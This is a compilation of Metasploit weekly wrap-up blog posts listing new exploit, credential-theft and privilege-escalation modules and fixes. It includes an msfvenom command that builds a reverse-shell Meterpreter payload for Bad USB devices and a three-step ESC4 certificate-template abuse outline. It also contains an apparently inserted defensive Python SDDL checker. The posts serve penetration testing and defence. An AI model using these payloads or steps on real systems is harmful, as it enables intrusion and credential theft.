All posts by Christopher Granleese

Metasploit Weekly Wrap-Up 01/12/24

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2024/01/12/metasploit-weekly-wrap-up-01-12-24/

New module content (1)

Windows Gather Mikrotik Winbox "Keep Password" Credentials Extractor

Author: Pasquale ‘sid’ Fiorillo
Type: Post
Pull request: #18604 contributed by siddolo
Path: windows/gather/credentials/winbox_settings

Description: This pull request introduces a new post module to extract the Mikrotik Winbox credentials, which are saved in the settings.cfg.viw file when the "Keep Password" option is selected in Winbox.

Enhancements and features (7)

  • #18515 from errorxyz – This PR adds a Java target for the ManageEngine ServiceDesk Plus exploit CVE-2022-47966 using the payload mentioned in this blog post, and deletes the log file that records the error caused by the exploit to make it more stealthy.
  • #18672 from h00die – Fix spelling mistakes in Metasploit’s library folder.
  • #18673 from h00die – Fix spelling mistakes in Metasploit’s scripts folder.
  • #18674 from h00die – Fix spelling mistakes in Metasploit’s plugins folder.
  • #18675 from h00die – Fix spelling mistakes in Metasploit’s tools folder.
  • #18679 from h00die – Fix spelling mistakes in Metasploit’s auxiliary modules.
  • #18691 from zeroSteiner – Metasploit console now requires an installed version of apktool greater than or equal to v2.9.2.

Bugs fixed (5)

  • #18656 from dwelch-r7 – Enforces all modules to be loaded as part of reload_all when the defer_module_loads feature is enabled.
  • #18666 from zeroSteiner – Fixes a crash when running the save command to save Metasploit’s configuration.
  • #18667 from zeroSteiner – Re-adds the #sysinfo instance method for sessions.
  • #18669 from sjanusz-r7 – Updates the favorites command to no longer output an empty message when a chosen module does not have custom datastore values available.
  • #18690 from sjanusz-r7 – Ensures that a target’s default payload is correctly chosen when selecting a module from the search command.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro.

Metasploit Wrap-up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/11/23/metasploit-wrapup-74/

Enhancements and features (2)

  • #18548 from zeroSteiner – Updates the admin/http/tomcat_ghostcat module to follow newer library conventions.
  • #18552 from adfoster-r7 – Adds support for Ruby 3.3.0-preview3.

Bugs fixed (5)

  • #18448 from HynekPetrak – Fixes and updates the auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass module to use renamed NEW_USERNAME and NEW_PASSWORD options.
  • #18538 from adfoster-r7 – Fixes an intermittent stream closed in another thread crash when booting msfconsole.
  • #18547 from adfoster-r7 – This fixes an issue in the platform detection used by the SSH login modules that was causing certain Windows environments to be incorrectly fingerprinted.
  • #18558 from zeroSteiner – Fixes a crash in the post/windows/gather/enum_chrome module which can be used to decrypt passwords stored by the user in Chrome.
  • #18564 from zeroSteiner – Fixes a module crash when running the auxiliary/server/capture/http module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/10/27/metasploit-weekly-wrap-up-33/

New module content (4)

Atlassian Confluence Data Center and Server Authentication Bypass via Broken Access Control

Authors: Emir Polat and Unknown
Type: Auxiliary
Pull request: #18447 contributed by emirpolatt
Path: admin/http/atlassian_confluence_auth_bypass
AttackerKB reference: CVE-2023-22515

Description: This adds an exploit for CVE-2023-22515, which is an authentication bypass within Atlassian Confluence that enables a remote attacker to create a new administrator account.

VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure

Authors: Harsh Jaiswal (@rootxharsh), Rahul Maini (@iamnoooob), SinSinology, and h00die
Type: Exploit
Pull request: #18460 contributed by h00die
Path: linux/ssh/vmware_vrni_known_privkey

Description: This adds a new exploit module that leverages the fact that SSH keys on VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0 are not randomized on initialization. It tries all the default SSH keys until one succeeds and gains unauthorized remote access as the "support" (root) user.

Splunk "edit_user" Capability Privilege Escalation

Authors: Heyder Andrade, Mr Hack (try_to_hack) Santiago Lopez, and Redway Security <redwaysecurity.com>
Type: Exploit
Pull request: #18348 contributed by heyder
Path: multi/http/splunk_privilege_escalation_cve_2023_32707

Description: This module exploits an authorization vulnerability in Splunk, targeting CVE-2023-32707, that allows a low privilege user with the capability edit_user to take over the admin account and log in to upload a malicious app, achieving remote code execution.

Add a new user to the system

Author: Nick Cottrell [email protected]
Type: Post
Pull request: #18194 contributed by rad10
Path: linux/manage/adduser

Description: This adds a post module that creates a new user on the target OS. It tries to use standard tools already available on the system, but it’s also able to directly update the plaintext database files (/etc/passwd and /etc/shadow). This module requires root privileges.

Enhancements and features (4)

  • #18299 from zgoldman-r7 – Improves error messages for timeouts when interacting with a Meterpreter session. Previously an unclear error was printed. Now the user is notified how to increase the timeout limit.
  • #18421 from smashery – This adds the capability to store the TGT ticket in the MSF kerberos cache when a successful Kerberos login is received by the kerberos_login brute force module.
  • #18466 from nfsec – Updates the Docker entrypoint script to use getent instead of grep when detecting user/group details.
  • #18299 from h00die – This adds a db_stats command which gives the user information about how much data is in their database/workspace.

Bugs fixed (2)

  • #18400 from dwelch-r7 – This fixes an issue when searching for a Kerberos ticket and passing in the workspace. The workspace is now correctly used to query the database.
  • #18403 from cdelafuente-r7 – Fixes a potential bug with modules that register files to cleanup after a session opens. Previously modules could accidentally mutate registered file names to delete, causing the intended files to be left on the remote system still.

Documentation added (1)

  • #18470 from zgoldman-r7 – Adds a new Wiki page for session management, detailing how to search for sessions and killing stale sessions.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/09/08/metasploit-weekly-wrap-up-26/

New module content (4)

Roundcube TimeZone Authenticated File Disclosure

Authors: joel, stonepresto, and thomascube
Type: Auxiliary
Pull request: #18286 contributed by cudalac
Path: auxiliary/gather/roundcube_auth_file_read
AttackerKB reference: CVE-2017-16651

Description: This PR adds a module to retrieve an arbitrary file on hosts running Roundcube versions from 1.1.0 through version 1.3.2.

Elasticsearch Memory Disclosure

Authors: Eric Howard, R0NY, and h00die
Type: Auxiliary
Pull request: #18322 contributed by h00die
Path: auxiliary/scanner/http/elasticsearch_memory_disclosure
AttackerKB reference: CVE-2021-22145

Description: Adds an aux scanner module which exploits a memory disclosure vulnerability within Elasticsearch 7.10.0 to 7.13.3 (inclusive) by submitting a malformed query that generates an error message containing previously used portions of a data buffer. The disclosed memory could contain sensitive information such as Elasticsearch documents or authentication details.

QueueJumper – MSMQ RCE Check

Authors: Bastian Kanbach, Haifei Li, and Wayne Low
Type: Auxiliary
Pull request: #18281 contributed by bka-dev
Path: auxiliary/scanner/msmq/cve_2023_21554_queuejumper
AttackerKB reference: CVE-2023-21554

Description: This PR adds a module that detects Windows hosts that are vulnerable to Microsoft Message Queuing Remote Code Execution aka QueueJumper.

SolarView Compact unauthenticated remote command execution vulnerability.

Author: h00die-gr3y
Type: Exploit
Pull request: #18313 contributed by h00die-gr3y
Path: exploits/linux/http/solarview_unauth_rce_cve_2023_23333
AttackerKB reference: CVE-2023-23333

Description: This PR adds a module which exploits a vulnerability that allows remote code execution on a vulnerable SolarView Compact device by bypassing internal restrictions through the vulnerable endpoint downloader.php using the file parameter. Firmware versions up to v6.33 are vulnerable.

Enhancements and features (2)

  • #18179 from jvoisin – This improves the windows checkvm post module by adding new techniques to identify the hypervisor in which the session is running.
  • #18190 from jvoisin – This improves the linux checkvm post module by adding new techniques to identify the hypervisor in which the session is running.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit weekly wrap-up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/08/11/metasploit-weekly-wrapup-8/

New module content (1)

Metabase Setup Token RCE

Authors: Maxwell Garrett, Shubham Shah, and h00die
Type: Exploit
Pull request: #18232 contributed by h00die
Path: exploits/linux/http/metabase_setup_token_rce
AttackerKB reference: CVE-2023-38646

Description: This adds a module for an unauthenticated RCE against Metabase. Metabase versions before 0.46.6.1 contain a bug where an unauthenticated user can retrieve a setup token. With this, they can query an API endpoint to set up a new database, then inject an H2 connection string to achieve RCE.

Enhanced Modules (1)

Modules which have either been enhanced, or renamed:

  • #18264 from zeroSteiner – Updates the exploits/freebsd/http/citrix_formssso_target_rce module for CVE-2023-3519 to include two new targets, Citrix ADC (NetScaler) 12.1-65.25, and 12.1-64.17. This module now supports automatic targeting based on the Last-Modified header of the logon/fonts/citrix-fonts.css resource.

Enhancements and features (6)

  • #18191 from jvoisin – This adds support for detecting whether a Metasploit session is running in a Podman container and improves detection for sessions running in Docker, LXC, and WSL containers.
  • #18224 from rorymckinley – This adds the first iteration of specs for SSH Login scanner.
  • #18231 from ErikWynter – This adds index selection for the modules returned via the favorites (or show favorites) command.
  • #18244 from cgranleese-r7 – Adds tests to ensure the consistency of Metasploit payloads.
  • #18274 from wvu – Updates CVE-2020-14871 exploits/solaris/ssh/pam_username_bof docs.

Bugs fixed (2)

  • #18220 from dwelch-r7 – Adds additional error handling when loading Metasploit payloads to msfconsole’s startup process to ensure missing payloads do not crash msfconsole.
  • #18260 from adfoster-r7 – This adds a fix to verify the EC2_ID module option is validated.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/06/02/metasploit-weekly-wrap-up-12/

AD CS certificate templates

Our very own Spencer McIntyre has developed a new module that allows for creating, reading, updating and deleting certificate template objects from Active Directory.

ESC4 Exploitation

These changes notably enable the exploitation of the technique identified as ESC4, whereby an attacker who has access to modify the certificate template object in LDAP can change it to set the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag in the mspki-certificate-name-flag field, enabling exploitation of ESC1. Exploiting this scenario would be a three step process:

  1. Use this module to update a certificate template that you have rights to modify
  2. Use the icpr_cert module to exploit ESC1 by specifying a privileged user in the ALT_UPN field
  3. Restore the certificate template that was replaced in step 1 with the backup that was automatically created

SDDL

When the user updates the certificate template, the nTSecurityDescriptor field is overwritten with one that provides all access to all authenticated users. This means it’s critical that the template be restored when the operator is finished. A backup is created every time the template is read, but it’s not restored automatically because the actions taken once the module has completed will likely involve another module such as icpr_cert.

The existing MsDtypSecurityDescriptor class has a new .from_sddl_text method to create a new instance from Microsoft’s (relatively) human-readable Security Descriptor Definition Language. This means the SID in the ACEs can be specified by copying the included template file and changing it to whatever the user would like. They could for example set it to the SID of the current user, or the domain admins group, etc.
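
The SDDL handling described above has a defender-side counterpart: checking whether a template's nTSecurityDescriptor hands write control to broad principals (the ESC4 precondition, and also the state a template is left in if the backup is never restored). The following Python is an added example, not Metasploit's own Ruby MsDtypSecurityDescriptor code; it parses an SDDL string into ACEs and reports the exposures. The sample descriptors are constructed; the enrollment GUID is the real Certificate-Enrollment extended right.

```python
"""Parse SDDL and flag ACEs giving broad principals write control over an AD CS template (ESC4)."""
import re
from dataclasses import dataclass, field

# Two-letter SDDL access-right codes and their ADS_RIGHT bit values.
RIGHT_BITS = {
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    "WO": 0x00080000, "WD": 0x00040000, "RC": 0x00020000, "SD": 0x00010000,
    "CR": 0x00000100, "LO": 0x00000080, "DT": 0x00000040, "WP": 0x00000020,
    "RP": 0x00000010, "SW": 0x00000008, "LC": 0x00000004, "DC": 0x00000002,
    "CC": 0x00000001,
}
# Well-known SID aliases that resolve to very broad groups.
BROAD_PRINCIPALS = {
    "AU": "Authenticated Users", "WD": "Everyone", "DU": "Domain Users",
    "DC": "Domain Computers", "BU": "Builtin Users", "AN": "Anonymous",
}
# Rights that let the holder rewrite the object, its DACL or its owner.
WRITE_CONTROL = {"GA", "GW", "WD", "WO"}

@dataclass
class Ace:
    ace_type: str      # A = allow, D = deny, OA = object allow, OD = object deny
    flags: str         # inheritance flags such as CI, OI, ID
    rights: set        # expanded two-letter right codes
    object_type: str   # GUID limiting the right to one property or extended right
    inherited_object_type: str
    trustee: str       # SID alias such as AU, or a literal S-1-... SID

@dataclass
class SecurityDescriptor:
    owner: str = ""
    group: str = ""
    dacl_flags: str = ""  # P (protected), AI, AR
    dacl: list = field(default_factory=list)

def parse_rights(token: str) -> set:
    """Expand a rights field given as a hex mask or concatenated 2-letter codes."""
    if token.lower().startswith("0x"):
        mask = int(token, 16)
        return {name for name, bit in RIGHT_BITS.items() if mask & bit}
    if len(token) % 2:
        raise ValueError(f"odd-length rights string: {token!r}")
    return {token[i:i + 2] for i in range(0, len(token), 2)}

def parse_ace(body: str) -> Ace:
    """Parse 'type;flags;rights;object_guid;inherit_guid;sid' (extra fields ignored)."""
    parts = body.split(";")
    if len(parts) < 6:
        raise ValueError(f"malformed ACE: ({body})")
    return Ace(parts[0], parts[1], parse_rights(parts[2]), parts[3], parts[4], parts[5])

def parse_sddl(text: str) -> SecurityDescriptor:
    sd = SecurityDescriptor()
    # Sections begin with O:, G:, D: or S:; ACE bodies and SIDs never contain ':'.
    for section in re.split(r"(?=[OGDS]:)", text.strip()):
        if not section:
            continue
        key, value = section[0], section[2:]
        if key == "O":
            sd.owner = value
        elif key == "G":
            sd.group = value
        elif key == "D":
            first_ace = value.find("(")
            sd.dacl_flags = value if first_ace < 0 else value[:first_ace]
            sd.dacl = [parse_ace(b) for b in re.findall(r"\(([^)]*)\)", value)]
        # S: (the SACL) holds only audit ACEs and is irrelevant to this check.
    return sd

def find_esc4_exposures(sd: SecurityDescriptor) -> list:
    """Return (principal, rights) for allow ACEs that let broad principals modify the template."""
    findings = []
    for ace in sd.dacl:
        if ace.ace_type not in ("A", "OA") or ace.trustee not in BROAD_PRINCIPALS:
            continue  # deny/audit ACEs grant nothing; narrow trustees are out of scope here
        dangerous = ace.rights & WRITE_CONTROL
        # Unscoped WP is "write every property", which covers
        # msPKI-Certificate-Name-Flag (home of CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT).
        if "WP" in ace.rights and not ace.object_type:
            dangerous.add("WP")
        if dangerous:
            findings.append((BROAD_PRINCIPALS[ace.trustee], sorted(dangerous)))
    return findings

# Constructed sample descriptors (not captured from a real domain).
CERT_ENROLL_GUID = "0e10c968-78fb-11d2-90d4-00c04f79dc55"  # Certificate-Enrollment right
SAFE_TEMPLATE = ("O:DAG:DAD:PAI"
                 f"(OA;;CR;{CERT_ENROLL_GUID};;DU)"      # Domain Users may enroll only
                 "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)"  # Domain Admins: full control
                 "(D;;WDWO;;;AU)"                        # a deny ACE must not count
                 "(A;;LCRPLORC;;;AU)")                   # Authenticated Users: read
# Stand-in for a template left with "all access to all authenticated users".
UNRESTORED_TEMPLATE = "O:DAG:DAD:PAI(A;;GA;;;AU)"
HEX_RIGHTS_TEMPLATE = "O:DAG:DAD:(A;;0x00020028;;;DU)"  # RC | WP | SW as a hex mask

if __name__ == "__main__":
    for name, sddl in (("safe", SAFE_TEMPLATE), ("unrestored", UNRESTORED_TEMPLATE), ("hex", HEX_RIGHTS_TEMPLATE)):
        print(f"{name}: {find_esc4_exposures(parse_sddl(sddl))}")
```

Running it against a template read back with ldapsearch (or the module's own backup file) after an engagement confirms the original DACL was restored rather than the permissive one.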

New module content (2)

AD CS Certificate Template Management

Authors: Lee Christensen, Oliver Lyak, Spencer McIntyre, and Will Schroeder
Type: Auxiliary
Pull request: #17965 contributed by zeroSteiner

Description: This adds an auxiliary module that can create, read, update, and delete certificate template objects from Active Directory.

Sudoedit Extra Arguments Priv Esc

Authors: Matthieu Barjole, Victor Cutillas, and h00die
Type: Exploit
Pull request: #17929 contributed by h00die
AttackerKB reference: CVE-2023-22809

Description: This adds an exploit for CVE-2023-22809, an LPE within sudoedit. The exploit currently only supports Ubuntu 22.04 and 22.10.

Enhancements and features (1)

  • #17989 from cgranleese-r7 – The auxiliary/admin/kerberos/inspect_ticket and auxiliary/admin/kerberos/forge_ticket modules have been updated to visually represent the decoded binary values of the Kerberos ticket fields.

Bugs fixed (4)

  • #18009 from cgranleese-r7 – This PR updates the msfdb commands to no longer enable the web services by default. The web service will now be enabled with the web service flag: --msf-data-service <NAME>.
  • #18010 from adfoster-r7 – Fix edge-case crash when running smb_login with Kerberos auth activated.
  • #18015 from distortedsignal – Deletes a dead link from the Using Metasploit page.
  • #18024 from zgoldman-r7 – This PR fixes an issue with credentials being normalized to lowercase inconsistently, causing collisions with uppercase data. Relevant credentials are now automatically normalized to lowercase on insert and lookup.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2023/01/13/metasploit-weekly-wrap-up-188/

New module content (2)

Gather Dbeaver Passwords

Author: Kali-Team
Type: Post
Pull request: #17337 contributed by cn-kali-team

Description: This adds a post exploit module that retrieves Dbeaver session data from local configuration files. It is able to extract and decrypt credentials stored in these files for any version of Dbeaver installed on Windows or Linux/Unix systems.

Gather MinIO Client Key

Author: Kali-Team
Type: Post
Pull request: #17341 contributed by cn-kali-team

Description: This adds a post module that gathers local credentials stored by the MinIO client on Windows, Linux, and MacOS.

Enhancements and features (2)

  • #17427 from gwillcox-r7 – This adds YARD documentation to the LDAP libraries for developers to reference.
  • #17447 from gwillcox-r7 – We now utilize ‘pry’ dependencies with support for newer Ruby versions.

Bugs fixed (3)

  • #17386 from smashery – A bug has been fixed whereby the HTTP library was parsing HTTP HEAD requests like GET requests, which was causing issues due to lack of compliance to RFC9110 standards. By updating the code to be more compliant with these standards, modules such as auxiliary/scanner/http/http_header now work as expected.
  • #17438 from ErikWynter – This fixes an issue in the exchange_proxylogon_collector module where it would crash if the LegacyDN was not present in the XML response.
  • #17454 from prabhatjoshi321 – A bug has been fixed whereby smb_enumshares incorrectly truncated file names before storing them into loot. This has been addressed so that only the console output will contain truncated file names, and the loot files will still contain the full file names for reference.

Documentation added (1)

  • #17395 from cgranleese-r7 – Adds documentation for both the JSON and MessagePack Metasploit RPC APIs – which is useful for programmatically interacting with Metasploit.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2022/11/25/metasploit-weekly-wrap-up-185/

F5 Big-IP

This week’s Metasploit release contains 2 new modules released as part of the Rapid7 F5 BIG-IP and iControl REST Vulnerabilities research article.

These discoveries were made by our very own Ron Bowes, who developed an exploit module for authenticated RCE against F5 devices running in appliance mode to achieve a Meterpreter session as the root user.

Ron Bowes has also developed an F5 Metasploit module exploiting CVE-2022-41622, a CSRF vulnerability in F5 Big-IP versions 17.0.0.1 and below – which leads to an arbitrary file overwrite as root. With this module, a user can choose to overwrite various system files to achieve a Meterpreter session as the root user.

For more information, see Rapid7’s blog post, which details the vulnerabilities.

DuckyScript support

Community contributor h00die contributed an enhancement to msfvenom. This adds the ducky-script-psh format to msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp -f ducky-script-psh lhost=127.0.0.1 lport=444

This allows users to create payloads that are compatible with Bad USB devices such as the Flipper Zero.

New module content (3)

Enhancements and features (6)

  • #17145 from k0pak4 – This PR adds the ability to authenticate via hash and improves the error reporting when authentication fails.
  • #17279 from h00die – This adds the ducky-script-psh format to msfvenom so it can create payloads that are compatible with Bad USB devices such as the Flipper Zero.
  • #17283 from bcoles – Improves the linux/gather/enum_psk module, and adds documentation.
  • #17284 from bcoles – Updates modules/post/linux/gather/enum_network and modules/post/linux/gather/tor_hiddenservices to extract hostname details in a similar fashion to other modules.
  • #17285 from bcoles – Improves validation in linux/gather/tor_hiddenservices to ensure that the locate command is present before running the module.
  • #17296 from jmartin-r7 – Adds clarification to the module documentation that links to external resources are not controlled by project maintainers. These external resources may no longer exist and are subject to malicious takeover in the future. These links should be reviewed accordingly.

Bugs fixed (1)

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2022/09/02/metasploit-weekly-wrap-up-174/

ICPR Certificate Management

This week Metasploit has a new ICPR Certificate Management module from Oliver Lyak and our very own Spencer McIntyre, which can be utilized for issuing certificates via Active Directory Certificate Services. Issuing certificates is useful in a few contexts, including persistence, ESC1, and as a primitive necessary for exploiting CVE-2022-26923. The resulting PFX certificate file is stored to loot and is encrypted using a blank password.

ManageEngine ADAudit Plus and DataSecurity Plus Xnode enum

Another addition, thanks to Erik Wynter and Sahil Dhar, brings two new auxiliary/gather modules and docs that take advantage of default Xnode credentials (CVE-2020-11532) in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server (Xnode). Because both modules rely on the same code to interact with Xnode, this change also adds a mixin at lib/msf/core/auxiliary/manageengine_xnode that is leveraged by both modules (plus by a third module that will be part of a separate PR). Both modules also come with configuration files to determine what data will be enumerated from Xnode. The PR contains even more information on the vulnerable systems and extensive notes!

New module content (5)

  • ICPR Certificate Management by Oliver Lyak and Spencer McIntyre – This adds a module for issuing certificates via Active Directory Certificate Services, which is useful in a few contexts including persistence and for some specific exploits. The resulting PFX certificate file is stored to the loot and is encrypted using a blank password.

  • ManageEngine ADAudit Plus Xnode Enumeration by Erik Wynter and Sahil Dhar, which exploits CVE-2020-11532 – Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, aka CVE-2020-11532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.

  • ManageEngine DataSecurity Plus Xnode Enumeration by Erik Wynter and Sahil Dhar, which exploits CVE-2020-11532 – Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, aka CVE-2020-11532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.

  • Zyxel Firewall SUID Binary Privilege Escalation by jbaines-r7, which exploits CVE-2022-30526 – This adds an LPE exploit for Zyxel Firewalls that can allow a user to escalate themselves to root. The vulnerability is identified as CVE-2022-30526 and is due to a suid binary that allows any user to copy files with root permissions.

  • CVE-2022-30190 AKA Follina by bwatters-r7 – This updates the exploit for CVE-2022-30190 (A.K.A Follina) to support generating RTF exploit documents. RTF documents are helpful for not only being another exploit vector, but they will trigger the payload execution when viewed by Explorer’s preview tab without needing user interaction to enable editing functionality.

Enhancements and features (4)

  • #16746 from adfoster-r7 – This updates the MSSQL login scanner to catch exceptions and continue running.

  • #16900 from bcoles – This adds a new #kill_process method that supports shell, PowerShell, and Meterpreter sessions on different platforms.

  • #16903 from bcoles – This cleans up the enum_shares post modules and adds support for shell sessions.

  • #16959 from adfoster-r7 – The time command has been updated with the --cpu and --memory profiler options to allow users to get memory and CPU usage profiles when running a command inside msfconsole.

Bugs fixed (5)

  • #16750 from bojanisc – This updates the exploit/multi/http/jenkins_script_console module to use the decoder from the java.util.Base64 class in place of the now-deprecated decoder from the sun.misc.BASE64Decoder class, enabling exploitation of newer Jenkins versions.

  • #16869 from bcoles – This fixes an issue in the file_remote_digestmd5() and file_remote_digestsha1() methods where read_file() would return an error message instead of the remote file contents. Additionally, the file_remote_digest* methods now support more session types, and they have a new util option that allows the user to perform the hashing on the remote host instead of downloading the remote file and performing the hashing locally.

  • #16918 from rbowes-r7 – A bug has been fixed in the module for CVE-2022-30333 whereby if the server responded with a 200 OK response, the module would keep trying to trigger the payload. This would lead to multiple sessions being returned when only one was desired.

  • #16920 from zeroSteiner – A typo has been fixed in _msfvenom that prevented ZSH autocompletion from working when using the --arch argument with msfvenom.

  • #16955 from gwillcox-r7 – This fixes an issue in the LDAP query module that would cause issues if the user queried for a field that was populated with binary data.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

  • [Pull Requests 6.2.14…6.2.15][prs-landed]
  • [Full diff 6.2.14…6.2.15][diff]

If you are a git user, you can clone the [Metasploit Framework repo][repo] (master branch) for the latest.
To install fresh without using git, you can use the open-source-only [Nightly Installers][nightly] or the
[binary installers][binary] (which also include the commercial edition).

[binary]: https://www.rapid7.com/products/metasploit/download.jsp
[diff]: https://github.com/rapid7/metasploit-framework/compare/6.2.14…6.2.15
[prs-landed]: https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:"2022-08-25T17%3A06%3A18%2B01%3A00..2022-09-01T12%3A53%3A23-04%3A00"
[nightly]: https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers
[repo]: https://github.com/rapid7/metasploit-framework

Metasploit Wrap-up

Post Syndicated from Christopher Granleese original https://blog.rapid7.com/2021/07/09/metasploit-wrap-up-120/

PrintNightmare

Rapid7 security researchers Christophe De La Fuente and Spencer McIntyre have added a new module for CVE-2021-34527, dubbed PrintNightmare. This module builds upon the research of Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0. The module triggers a remote DLL load by abusing a vulnerability in the Print Spooler service. The Print Spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request using the MS-RPRN vector, resulting in remote code execution as NT AUTHORITY\SYSTEM.

Because Metasploit’s SMB server doesn’t support SMB3 (yet), it’s highly recommended to use an external SMB server like Samba that supports SMB3. The Metasploit module documentation details the process of generating a payload DLL and using this module to load it.

CVE-2021-34527 is being actively exploited in the wild. For more information and a full timeline, see Rapid7’s blog on PrintNightmare!

NSClient++

Great work by community contributor Yann Castel on their new NSClient++ module. This module allows an attacker with an unprivileged Windows account to gain admin access on a Windows system and start a shell.

For this module to work, both the web interface of NSClient++ and the ExternalScripts feature should be enabled. You must also know where the NSClient config file is as it is used to read the admin password which is stored in clear text.

New module content (2)

  • Print Spooler Remote DLL Injection by Christophe De La Fuente, Piotr Madej, Spencer McIntyre, Xuefeng Li, Zhang Yunhai, Zhiniang Peng, Zhipeng Huo, and cube0x0, which exploits CVE-2021-34527 – A new module has been added to Metasploit to exploit PrintNightmare, aka CVE-2021-1675/CVE-2021-34527, a Remote Code Execution vulnerability in the Print Spooler service of Windows. Successful exploitation results in the ability to load and execute an attacker controlled DLL as the SYSTEM user.

  • NSClient++ 0.5.2.35 – Privilege escalation by BZYO, Yann Castel and kindredsec – This post module allows an attacker to perform a privilege escalation on a machine running a vulnerable version of NSClient++. The module retrieves the admin password from a config file at a customizable path, and so long as NSClient++ has both the web interface and ExternalScripts feature enabled, gains a SYSTEM shell.

Enhancements and features

  • #15366 from pingport80 – This updates how the msfconsole’s history file is handled. It adds a size limitation so the number of commands does not grow indefinitely and fixes a locking condition that would occur when the history file had grown exceptionally large (~400,000 lines or more).

Bugs fixed

  • #15320 from agalway-r7 – A bug has been fixed in the read_file method of lib/msf/core/post/file.rb that prevented PowerShell sessions from being able to use the read_file() method. PowerShell sessions should now be able to use this method to read files from the target system.
  • #15371 from bcoles – This fixes an issue in the apport_abrt_chroot_priv_esc module where if the apport-cli binary was not in the PATH the check method would fail.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).